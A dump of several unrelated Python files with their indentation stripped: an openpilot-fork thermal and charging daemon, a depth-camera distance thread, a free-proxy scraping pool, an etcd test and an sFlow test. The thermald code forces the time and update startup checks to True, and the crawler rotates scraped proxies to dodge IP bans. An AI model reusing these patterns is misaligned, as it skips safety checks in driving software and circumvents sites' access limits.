elif (charging_disabled or not charging_disabled) and (msg.deviceState.batteryPercent < int(kegman_kans.conf['battChargeMax']) or (pandaStates is None and not should_start)):
charging_disabled = False
os.system('echo "1" > /sys/class/power_supply/battery/charging_enabled')
elif not charging_disabled and (msg.deviceState.batteryPercent > int(kegman_kans.conf['battChargeMax']) or (pandaStates is not None and not should_start)):
charging_disabled = True
os.system('echo "0" > /sys/class/power_supply/battery/charging_enabled')
elif msg.deviceState.batteryCurrent < 0 and msg.deviceState.batteryPercent > int(kegman_kans.conf['battChargeMax']):
charging_disabled = True
os.system('echo "0" > /sys/class/power_supply/battery/charging_enabled')
  return charging_disabled  # end of the charging-control block
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
charging_disabled = False
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
# neokii
restart_triggered_ts = 0.
  panda_state_ts = 0.  # neokii additions up to this line
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot() # untill to this line neokii
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
# neokii
if pandaState.pandaType != log.PandaState.PandaType.unknown:
        panda_state_ts = sec_since_boot()  # neokii additions up to this line
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
# neokii
else:
if sec_since_boot() - panda_state_ts > 3.:
if onroad_conditions["ignition"]:
cloudlog.error("Lost panda connection while onroad")
onroad_conditions["ignition"] = False # untill to this line neokii
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryStatus = HARDWARE.get_battery_status()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
    # From here to the marked line below: battery-charging enable/disable control
charging_disabled = check_car_battery_voltage(should_start, pandaStates, charging_disabled, msg)
if msg.deviceState.batteryCurrent > 0:
msg.deviceState.batteryStatus = "Discharging"
else:
msg.deviceState.batteryStatus = "Charging"
    msg.deviceState.chargingDisabled = charging_disabled  # end of the charging-control block
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
print(msg) # for charging disabled
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
distanceFinder.py
|
from threading import Thread
import cv2
import vision
import pyrealsense2
class DistanceGet:
"""
    Class that continuously measures the distance to a detected object from RealSense depth frames, using a dedicated thread.
"""
def __init__(self):
self.frames = None
self.stopped = False
self.x = 0
self.y = 0
self.w = 0
self.h = 0
self.distance = None
self.average = [0] * 5
self.dist_prev = None
def start(self):
Thread(target=self.getDist, args=()).start()
return self
def getDist(self):
while not self.stopped:
if self.x != 0:
depth_frame = self.frames.get_depth_frame()
count = 0
total = 0
distprev = 0
try:
pass
                    # measure the distance of every pixel of the blob at half of its height, across its width
for z in range(int(self.w)):
for i in range(int(20)):
dist = depth_frame.get_distance(self.x + z, int(self.y/2) + i)
#print(dist)
if dist == 0.0:
pass
elif distprev == 0:
distprev = dist
elif dist > 1.2 * distprev:
pass
elif dist < 0.8 * distprev:
pass
else:
total += dist
count += 1
distprev = dist
                    # arithmetic average of all of the measurements
self.distance = (total / count)
print(self.distance)
# print(self.x, self.y, self.w, self.h)
# # print(video_getter.distance)
# # print(video_getter.x, video_getter.y, video_getter.w, video_getter.h)
# if dist < 1.33 * self.dist_prev or dist > 0.67 * self.dist_prev or 0 in self.average:
# self.average.append(dist)
# self.distance = sum(self.average) / len(self.average)
# self.dist_prev = dist
# else:
# print("värdmõõt" + str(dist))
except:
# print("Error in measuring distance from pixel")
pass
def stop(self):
self.stopped = True
|
pool.py
|
"""
Multithreaded crawler that gathers proxies from free proxy-list websites
"""
from proxy_pool import settings
from proxy_pool.db import Proxy
from proxy_pool.utils import print_log
from queue import Queue
import threading
import requests
import random
import time
import re
# turn off unnecessary warnings
requests.packages.urllib3.disable_warnings()
class ProxyWebsite:
def __init__(self, base_url, pages=range(1,2)):
self.base_url = base_url
self.pages = pages
self.count = -1
def __iter__(self):
return self
def __next__(self):
self.count += 1
if self.count < len(self.pages):
return self.base_url.format(self.pages[self.count])
else:
raise StopIteration
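# Illustrative example (not part of the original module): iterating a
# ProxyWebsite yields one formatted URL per page, e.g.
#   list(ProxyWebsite('http://example.com/page/{}', range(1, 3)))
#   -> ['http://example.com/page/1', 'http://example.com/page/2']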
def utils_request(url):
"""
    Use a working proxy from the pool to crawl for more proxies.
    If the pool has no working proxy, fall back to the local machine's IP.
    On failure the working proxy is NOT removed from the pool, because
    failures have many possible causes and working proxies are precious...
"""
headers = {'User-Agent': random.choice(settings.USER_AGENTS)}
try:
proxy = Proxy.random(max_count=0)
print_log('Using {} to fetch {}...'.format(proxy.value, url))
proxies = {'http': proxy.value}
except IndexError:
proxies = {}
try:
response = requests.get(url, headers=headers, proxies=proxies, timeout=10)
if response.status_code == 200:
return response.text
except requests.exceptions.ProxyError:
pass
except requests.exceptions.ReadTimeout:
pass
except requests.exceptions.ConnectionError:
pass
except requests.exceptions.ChunkedEncodingError:
pass
def init_queue(proxy_websites):
queue = Queue() # unlimited
url_list = []
for proxy_website in proxy_websites:
for url in proxy_website:
url_list.append(url)
random.shuffle(url_list)
for url in url_list:
queue.put(url)
return queue
def proxy_website_crawler(queue):
while True:
        # The number of proxies that have passed testing must exceed the pool SIZE.
        # The total of untested plus tested proxies must stay below POOL_MAX_SIZE.
        # This avoids over-crawling the proxy sites and getting the local IP banned.
if (Proxy.total() < settings.POOL_MAX_SIZE
and len(list(Proxy.filter({'count': 0}))) < settings.POOL_SIZE):
url = queue.get()
html = utils_request(url)
if not html:
continue
html = re.sub(r'<.*?>', ' ', html)
html = re.sub(r'\s+', ' ', html)
values = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).*?(\d{2,5})', html)
for value in values:
value = '{}:{}'.format(value[0], value[1]) # very important formatting
p = Proxy(value=value)
try:
Proxy.get({'value': p.value})
except LookupError:
p.save()
p.status('add')
queue.task_done()
else:
time.sleep(5)
def pool_run():
# proxy_websites = [
# ProxyWebsite('https://seotoolstation.com/free-proxy-list'), # easy
# ProxyWebsite('http://www.xicidaili.com/nn/{}', range(1,3000)),
# ProxyWebsite('http://www.xicidaili.com/nt/{}', range(1,690)),
# ProxyWebsite('http://www.xicidaili.com/wn/{}', range(1,1400)),
# ProxyWebsite('http://www.xicidaili.com/wt/{}', range(1,1800)),
# ProxyWebsite('http://www.66ip.cn/{}.html', ['index.html'] + list(range(1,1339))), # easy
# ProxyWebsite('http://www.ip3366.net/free/?page={}', range(1,7)), # easy
# ProxyWebsite('https://www.kuaidaili.com/free/inha/{}/',range(1,1000)), # easy
# ProxyWebsite('https://www.kuaidaili.com/free/intr/{}/',range(1,1000)), # easy
# ProxyWebsite('http://www.data5u.com/free/{}/index.shtml',['gngn', 'gnpt', 'gwgn', 'gwpt']), # easy
# ProxyWebsite('http://www.data5u.com/'), # easy
# ProxyWebsite('http://www.89ip.cn/index_{}.html',range(1, 2000)), # easy
# ProxyWebsite('http://ip.jiangxianli.com/?page={}',range(1,7)), # easy
# ProxyWebsite('http://www.mimiip.com/gngao/{}',range(1,600)), # easy
# ]
proxy_websites = [
ProxyWebsite('https://seotoolstation.com/free-proxy-list'), # easy
ProxyWebsite('http://www.xicidaili.com/nn/{}', range(1,100)),
ProxyWebsite('http://www.xicidaili.com/nt/{}', range(1,100)),
ProxyWebsite('http://www.xicidaili.com/wn/{}', range(1,100)),
ProxyWebsite('http://www.xicidaili.com/wt/{}', range(1,100)),
ProxyWebsite('http://www.66ip.cn/{}.html', ['index.html'] + list(range(1,100))), # easy
ProxyWebsite('http://www.ip3366.net/free/?page={}', range(1,7)), # easy
ProxyWebsite('https://www.kuaidaili.com/free/inha/{}/',range(1,100)), # easy
ProxyWebsite('https://www.kuaidaili.com/free/intr/{}/',range(1,100)), # easy
ProxyWebsite('http://www.data5u.com/free/{}/index.shtml',['gngn', 'gnpt', 'gwgn', 'gwpt']), # easy
ProxyWebsite('http://www.data5u.com/'), # easy
ProxyWebsite('http://www.89ip.cn/index_{}.html',range(1, 100)), # easy
ProxyWebsite('http://ip.jiangxianli.com/?page={}',range(1,7)), # easy
ProxyWebsite('http://www.mimiip.com/gngao/{}',range(1,100)), # easy
]
while True:
queue = init_queue(proxy_websites)
print_log('{} URLs are ready to bring you proxies...'.format(queue.qsize()))
threads = []
for i in range(settings.POOL_WORKERS):
thread = threading.Thread(target=proxy_website_crawler, args=(queue,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
queue.join()
|
conman_etcd_test.py
|
import os
import sys
import time
from collections import defaultdict
from threading import Thread
from conman.conman_etcd import ConManEtcd
from conman.etcd_test_util import (start_local_etcd_server,
kill_local_etcd_server,
set_key,
delete_key)
from functools import partial
from unittest import TestCase
class ConManEtcdTest(TestCase):
@classmethod
def setUpClass(cls):
kill_local_etcd_server()
# Start local etcd server if not running
start_local_etcd_server()
# Add good key
cls.good_dict = dict(a='1', b='Yeah, it works!!!')
@classmethod
def tearDownClass(cls):
try:
kill_local_etcd_server()
except: # noqa
pass
def setUp(self):
self.conman = ConManEtcd()
cli = self.conman.client
delete_key(cli, 'good')
delete_key(cli, 'refresh_test')
set_key(cli, 'good', self.good_dict)
def tearDown(self):
cli = self.conman.client
delete_key(cli, 'good')
delete_key(cli, 'refresh_test')
delete_key(cli, 'watch_test')
cli.close()
def test_initialization(self):
cli = self.conman.client
self.assertEqual('127.0.0.1:2379', cli._url)
def test_add_good_key(self):
self.conman.add_key('good')
expected = self.good_dict
actual = self.conman['good']
self.assertEqual(expected, actual)
def test_add_bad_key(self):
self.assertRaises(Exception, self.conman.add_key, 'no such key')
def test_refresh(self):
self.assertFalse('refresh_test' in self.conman)
# Insert a new key to etcd
set_key(self.conman.client, 'refresh_test', dict(a='1'))
# The new key should still not be visible by conman
self.assertFalse('refresh_test' in self.conman)
# Refresh to get the new key
self.conman.refresh('refresh_test')
# The new key should now be visible by conman
self.assertEqual(dict(a='1'), self.conman['refresh_test'])
# Change the key
set_key(self.conman.client, 'refresh_test', dict(b='3'))
# The previous value should still be visible by conman
self.assertEqual(dict(a='1'), self.conman['refresh_test'])
# Refresh again
self.conman.refresh('refresh_test')
# The new value should now be visible by conman
self.assertEqual(dict(b='3'), self.conman['refresh_test'])
def test_dictionary_access(self):
self.conman.add_key('good')
self.assertEqual(self.good_dict, self.conman['good'])
def test_watch_existing_key(self):
def on_change(change_dict, event):
change_dict[event.key].append((type(event).__name__, event.value))
change_dict = defaultdict(list)
self.assertFalse('watch_test' in self.conman)
# Insert a new key to etcd
self.conman.client.put('watch_test/a', '1')
# The new key should still not be visible by conman
self.assertFalse('watch_test' in self.conman)
# Refresh to get the new key
self.conman.refresh('watch_test')
# The new key should now be visible by conman
self.assertEqual(dict(a='1'), self.conman['watch_test'])
# Set the on_change() callback of conman (normally at construction)
on_change = partial(on_change, change_dict)
self.conman.on_change = on_change
watch_id = None
try:
watch_id = self.conman.watch('watch_test/b')
# Change the key
self.conman.client.put('watch_test/b', '3')
# The previous value should still be visible by conman
self.assertEqual(dict(a='1'), self.conman['watch_test'])
# Wait for the change callback to detect the change
for i in range(3):
if change_dict:
break
time.sleep(1)
expected = {b'watch_test/b': [('PutEvent', b'3')]}
actual = dict(change_dict)
self.assertEqual(expected, actual)
# Refresh again
self.conman.refresh('watch_test')
# The new value should now be visible by conman
self.assertEqual(dict(a='1', b='3'), self.conman['watch_test'])
finally:
if watch_id is not None:
self.conman.cancel(watch_id)
def test_watch_prefix(self):
all_events = []
def read_events_in_thread():
with open(os.devnull, 'w') as f:
sys.stdout = f
sys.stderr = f
events, cancel = self.conman.watch_prefix('watch_prefix_test')
for event in events:
k = event.key.decode()
v = event.value.decode()
s = f'{k}: {v}'
all_events.append(s)
if v == 'stop':
cancel()
t = Thread(target=read_events_in_thread)
t.start()
# Insert a new key to etcd
self.conman.client.put('watch_prefix_test/a', '1')
self.conman.client.put('watch_prefix_test/b', '2')
time.sleep(1)
self.conman.client.put('watch_prefix_test', 'stop')
t.join()
expected = [
'watch_prefix_test/a: 1',
'watch_prefix_test/b: 2',
'watch_prefix_test: stop'
]
self.assertEqual(expected, all_events)
|
sflow_test.py
|
#ptf --test-dir ptftests sflow_test --platform-dir ptftests --platform remote -t "enabled_sflow_interfaces=[u'Ethernet116', u'Ethernet124', u'Ethernet112', u'Ethernet120'];active_collectors=[];dst_port=3;testbed_type='t0';router_mac=u'52:54:00:f7:0c:d0';sflow_ports_file='/tmp/sflow_ports.json';agent_id=u'10.250.0.101'" --relax --debug info --log-file /tmp/TestSflowCollector.test_two_collectors.log --socket-recv-size 16384
#/usr/bin/python /usr/bin/ptf --test-dir ptftests sflow_test --platform-dir ptftests --platform remote -t "enabled_sflow_interfaces=[u'Ethernet116', u'Ethernet124', u'Ethernet112', u'Ethernet120'];active_collectors=['collector1'];dst_port=3;testbed_type='t0';router_mac='52:54:00:f7:0c:d0';sflow_ports_file='/tmp/sflow_ports.json';agent_id=u'10.250.0.101'" --relax --debug info --log-file /tmp/TestSflow.log --socket-recv-size 16384
import ptf
import ptf.packet as scapy
import ptf.dataplane as dataplane
import json
from ptf import config
from ptf.base_tests import BaseTest
import ptf.dataplane as dataplane
from ptf.testutils import *
from ptf.mask import Mask
import ipaddress
from json import loads
import threading
import time
import select
from collections import Counter
import logging
import ast
import subprocess
class SflowTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
self.test_params = test_params_get()
#--------------------------------------------------------------------------
def setUp(self):
self.dataplane = ptf.dataplane_instance
self.router_mac = self.test_params['router_mac']
self.dst_port = self.test_params['dst_port']
if 'enabled_sflow_interfaces' in self.test_params:
self.enabled_intf = self.test_params['enabled_sflow_interfaces']
self.agent_id = self.test_params['agent_id']
self.active_col = self.test_params['active_collectors']
self.sflow_interfaces = []
self.sflow_ports_file = self.test_params['sflow_ports_file']
if 'polling_int' in self.test_params:
self.poll_tests = True
self.polling_int = self.test_params['polling_int']
else:
self.poll_tests = False
with open(self.sflow_ports_file) as fp:
self.interfaces = json.load(fp)
for port,index in self.interfaces.items():
self.sflow_interfaces.append(index["ptf_indices"])
logging.info("Sflow interfaces under Test : %s" %self.interfaces)
self.collectors=['collector0','collector1']
for param,value in self.test_params.items():
logging.info("%s : %s" %(param,value) )
def tearDown(self):
self.cmd(["supervisorctl", "stop", "arp_responder"])
self.cmd(["killall" , "sflowtool"])
#--------------------------------------------------------------------------
def generate_ArpResponderConfig(self):
config = {}
vlan_ip_prefixes = ['192.168.0.2','192.168.0.3','192.168.0.4']
config['eth%d' %self.dst_port] = ['192.168.0.4']
with open('/tmp/sflow_arpresponder.conf', 'w') as fp:
json.dump(config, fp)
self.cmd(["supervisorctl", "restart", "arp_responder"])
#--------------------------------------------------------------------------
def cmd(self, cmds):
process = subprocess.Popen(cmds,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return_code = process.returncode
return stdout, stderr, return_code
#--------------------------------------------------------------------------
def read_data(self, collector, sflow_port=['6343']):
"""
Starts sflowtool with the corresponding port and saves the data to file for processing
"""
outfile='/tmp/%s'%collector
with open(outfile , 'w') as f:
process = subprocess.Popen(
['/usr/local/bin/sflowtool','-j','-p'] + sflow_port ,
stdout=f,
stderr=subprocess.STDOUT,
shell = False
)
flow_count = 0
counter_count = 0
port_sample ={}
port_sample[collector]={}
port_sample[collector]['FlowSample'] = {}
port_sample[collector]['CounterSample'] = {}
logging.info("Collector %s starts collecting ......"%collector)
while not self.stop_collector :
continue
process.terminate()
f.close()
with open(outfile , 'r') as sflow_data:
for line in sflow_data:
j = json.dumps(ast.literal_eval(line))
datagram = json.loads(j)
agent= datagram["agent"]
samples = datagram["samples"]
for sample in samples:
sampleType = sample["sampleType"]
if sampleType == "FLOWSAMPLE":
flow_count+=1
port_sample[collector]['FlowSample'][flow_count] = sample
elif sampleType == "COUNTERSSAMPLE":
counter_count+=1
port_sample[collector]['CounterSample'][counter_count] = sample
port_sample[collector]['CounterSample'][counter_count]['agent_id'] = agent
sflow_data.close()
port_sample[collector]['counter_count'] = counter_count
port_sample[collector]['flow_count'] = flow_count
port_sample[collector]['total_count'] = counter_count + flow_count
logging.info( "%s Sampled Packets : Total flow samples -> %s Total counter samples -> %s" %(collector,flow_count,counter_count))
return(port_sample)
#--------------------------------------------------------------------------
def collector_0(self):
collector='collector0'
self.collector0_samples=self.read_data('collector0')
#--------------------------------------------------------------------------
def collector_1(self):
collector = 'collector1'
        self.collector1_samples = self.read_data('collector1', ['6344'])
#--------------------------------------------------------------------------
def packet_analyzer(self, port_sample, collector, poll_test):
logging.info("Analysing collector %s"%collector)
data= {}
data['total_samples'] = 0
data['total_flow_count'] = port_sample[collector]['flow_count']
data['total_counter_count'] = port_sample[collector]['counter_count']
data['total_samples'] = port_sample[collector]['flow_count'] + port_sample[collector]['counter_count']
logging.info(data)
if data['total_flow_count']:
data['flow_port_count'] = Counter(k['inputPort'] for k in port_sample[collector]['FlowSample'].values())
if collector not in self.active_col:
logging.info("....%s : Sample Packets are not expected , received %s flow packets and %s counter packets"%(collector,data['total_flow_count'],data['total_counter_count']))
self.assertTrue(data['total_samples'] == 0 ,
"Packets are not expected from %s , but received %s flow packets and %s counter packets" %(collector,data['total_flow_count'],data['total_counter_count']))
else:
if poll_test:
if self.polling_int == 0:
logging.info("....Polling is disabled , Number of counter samples collected %s"%data['total_counter_count'])
self.assertTrue(data['total_counter_count'] == 0,
"Received %s counter packets when polling is disabled in %s"%(data['total_counter_count'],collector))
else:
logging.info("..Analyzing polling test counter packets")
self.assertTrue(data['total_samples'] != 0 ,
"....Packets are not received in active collector ,%s"%collector)
self.analyze_counter_sample(data,collector,self.polling_int,port_sample)
else:
logging.info("Analyzing flow samples in collector %s"%collector)
self.assertTrue(data['total_samples'] != 0 ,
"....Packets are not received in active collector ,%s"%collector)
self.analyze_flow_sample(data,collector)
return data
#--------------------------------------------------------------------------
def analyze_counter_sample(self, data, collector, polling_int, port_sample):
counter_sample = {}
for intf in self.interfaces.keys():
counter_sample[intf] = 0
self.assertTrue(data['total_counter_count'] >0, "No counter packets are received in collector %s"%collector)
for i in range(1,data['total_counter_count']+1):
rcvd_agent_id = port_sample[collector]['CounterSample'][i]['agent_id']
